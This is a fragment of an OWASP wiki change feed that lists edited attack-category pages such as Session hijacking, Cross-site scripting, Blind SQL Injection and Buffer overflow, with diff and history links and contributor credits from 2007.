* [[Session_hijacking_attack]] - ([http://www.owasp.org/index.php?title=Session_hijacking_attack&amp;amp;diff=22733&amp;amp;oldid=6467 diff] , [http://www.owasp.org/index.php?title=Session_hijacking_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Setting_Manipulation]] - ([http://www.owasp.org/index.php?title=Setting_Manipulation&amp;amp;diff=22734&amp;amp;oldid=7984 diff] , [http://www.owasp.org/index.php?title=Setting_Manipulation&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Special_Element_Injection]] - ([http://www.owasp.org/index.php?title=Special_Element_Injection&amp;amp;diff=20884&amp;amp;oldid=6447 diff] , [http://www.owasp.org/index.php?title=Special_Element_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Spyware]] - ([http://www.owasp.org/index.php?title=Spyware&amp;amp;diff=22761&amp;amp;oldid=6448 diff] , [http://www.owasp.org/index.php?title=Spyware&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Traffic_flood]] - ([http://www.owasp.org/index.php?title=Traffic_flood&amp;amp;diff=22775&amp;amp;oldid=7392 diff] , [https://www.owasp.org/index.php?title=Traffic_flood&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Trojan_Horse]] - ([http://www.owasp.org/index.php?title=Trojan_Horse&amp;amp;diff=22756&amp;amp;oldid=7078 diff] , [http://www.owasp.org/index.php?title=Trojan_Horse&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Unicode_Encoding]] - ([http://www.owasp.org/index.php?title=Unicode_Encoding&amp;amp;diff=22729&amp;amp;oldid=7943 diff] , [http://www.owasp.org/index.php?title=Unicode_Encoding&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Web_Parameter_Tampering]] - ([http://www.owasp.org/index.php?title=Web_Parameter_Tampering&amp;amp;diff=20883&amp;amp;oldid=6831 diff] , [http://www.owasp.org/index.php?title=Web_Parameter_Tampering&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
by Przemyslaw 'rezos' Skowron (20071025 - part I - first 50%])&lt;br /&gt;
&lt;br /&gt;
* [[Absolute_Path_Traversal]] - ([http://www.owasp.org/index.php?title=Absolute_Path_Traversal&amp;amp;diff=22637&amp;amp;oldid=14001 diff] , [http://www.owasp.org/index.php?title=Absolute_Path_Traversal&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Argument_Injection_or_Modification]] - ([http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;amp;diff=22638&amp;amp;oldid=5186 diff] , [http://www.owasp.org/index.php?title=Argument_Injection_or_Modification&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Brute_force_attack]] - ([http://www.owasp.org/index.php?title=Brute_force_attack&amp;amp;diff=22641&amp;amp;oldid=13966 diff] , [http://www.owasp.org/index.php?title=Brute_force_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Buffer_overflow_attack]] - ([http://www.owasp.org/index.php?title=Buffer_overflow_attack&amp;amp;diff=22642&amp;amp;oldid=7390 diff] , [http://www.owasp.org/index.php?title=Buffer_overflow_attack&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cache_Poisoning]] - ([http://www.owasp.org/index.php?title=Cache_Poisoning&amp;amp;diff=22647&amp;amp;oldid=13172 diff] , [http://www.owasp.org/index.php?title=Cache_Poisoning&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Code_Injection]] - ([http://www.owasp.org/index.php?title=Code_Injection&amp;amp;diff=22651&amp;amp;oldid=7913 diff] , [http://www.owasp.org/index.php?title=Code_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Command_Injection]] - ([http://www.owasp.org/index.php?title=Command_Injection&amp;amp;diff=22654&amp;amp;oldid=16438 diff] , [http://www.owasp.org/index.php?title=Command_Injection&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-Site_Request_Forgery]] - ([http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;amp;diff=22643&amp;amp;oldid=19627 diff] , [http://www.owasp.org/index.php?title=Cross-Site_Request_Forgery&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-User_Defacement]] - ([http://www.owasp.org/index.php?title=Cross-User_Defacement&amp;amp;diff=22658&amp;amp;oldid=7949 diff] , [http://www.owasp.org/index.php?title=Cross-User_Defacement&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Cross-site-scripting]] - ([http://www.owasp.org/index.php?title=Cross-site-scripting&amp;amp;diff=22660&amp;amp;oldid=21443 diff] , [http://www.owasp.org/index.php?title=Cross-site-scripting&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[Integer_Overflows/Underflows]] - ([http://www.owasp.org/index.php?title=Integer_Overflows%2FUnderflows&amp;amp;diff=22661&amp;amp;oldid=7380 diff] , [http://www.owasp.org/index.php?title=Integer_Overflows/Underflows&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
* [[XSS_in_error_pages]] - ([http://www.owasp.org/index.php?title=XSS_in_error_pages&amp;amp;diff=22662&amp;amp;oldid=6850 diff] , [http://www.owasp.org/index.php?title=XSS_in_error_pages&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
by Przemyslaw 'rezos' Skowron (20071104 - part II - second 50%])&lt;br /&gt;
&lt;br /&gt;
* [[Account_lockout_attack]] - ([http://www.owasp.org/index.php?title=Account_lockout_attack&amp;amp;diff=22954&amp;amp;oldid=6117 diff] , [http://www.owasp.org/index.php?title=Account_lockout_attack&amp;amp;action=history history])&lt;br /&gt;
* [[Alternate_XSS_Syntax]] - ([http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&amp;amp;diff=22956&amp;amp;oldid=16480 diff], [http://www.owasp.org/index.php?title=Alternate_XSS_Syntax&amp;amp;action=history history])&lt;br /&gt;
* [[Asymmetric_resource_consumption_%28amplification%29]] - ([http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&amp;amp;diff=22957&amp;amp;oldid=5188 diff], [http://www.owasp.org/index.php?title=Asymmetric_resource_consumption_%28amplification%29&amp;amp;action=history history])&lt;br /&gt;
* [[Blind_SQL_Injection]] - ([http://www.owasp.org/index.php?title=Blind_SQL_Injection&amp;amp;diff=22959&amp;amp;oldid=14497 diff], [http://www.owasp.org/index.php?title=Blind_SQL_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[Blind_XPath_Injection]] - ([http://www.owasp.org/index.php?title=Blind_XPath_Injection&amp;amp;diff=22960&amp;amp;oldid=9579 diff], [http://www.owasp.org/index.php?title=Blind_XPath_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[Comment_Element]] - ([http://www.owasp.org/index.php?title=Comment_Element&amp;amp;diff=22961&amp;amp;oldid=5325 diff], [http://www.owasp.org/index.php?title=Comment_Element&amp;amp;action=history history])&lt;br /&gt;
* [[Cryptanalysis]] - ([http://www.owasp.org/index.php?title=Cryptanalysis&amp;amp;diff=22962&amp;amp;oldid=7389 diff], [http://www.owasp.org/index.php?title=Cryptanalysis&amp;amp;action=history history])&lt;br /&gt;
* [[Custom_Special_Character_Injection]] - ([http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&amp;amp;diff=22963&amp;amp;oldid=5357 diff], [http://www.owasp.org/index.php?title=Custom_Special_Character_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[XPATH_Injection]] - ([http://www.owasp.org/index.php?title=XPATH_Injection&amp;amp;diff=22965&amp;amp;oldid=21461 diff], [http://www.owasp.org/index.php?title=XPATH_Injection&amp;amp;action=history history])&lt;br /&gt;
* [[XSS_using_Script_Via_Encoded_URI_Schemes]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&amp;amp;diff=22936&amp;amp;oldid=6851 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_Via_Encoded_URI_Schemes&amp;amp;action=history history])&lt;br /&gt;
* [[XSS_using_Script_in_Attributes ]] - ([http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&amp;amp;diff=22937&amp;amp;oldid=6852 diff], [http://www.owasp.org/index.php?title=XSS_using_Script_in_Attributes&amp;amp;action=history history])&lt;br /&gt;
&lt;br /&gt;
NEW ITEMS - 20071104 (by Przemyslaw 'rezos' Skowron):&lt;br /&gt;
* [[Overflow_Binary_Resource_File]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Overflow_Binary_Resource_File&amp;amp;action=history history])&lt;br /&gt;
* [[Cross_Frame_Scripting]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Cross_Frame_Scripting&amp;amp;action=history history])&lt;br /&gt;
* [[Buffer_Overflow_via_Environment_Variables]] - ([INITIAL VERSION diff] , [http://www.owasp.org/index.php?title=Buffer_Overflow_via_Environment_Variables&amp;amp;action=history history])&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	</feed>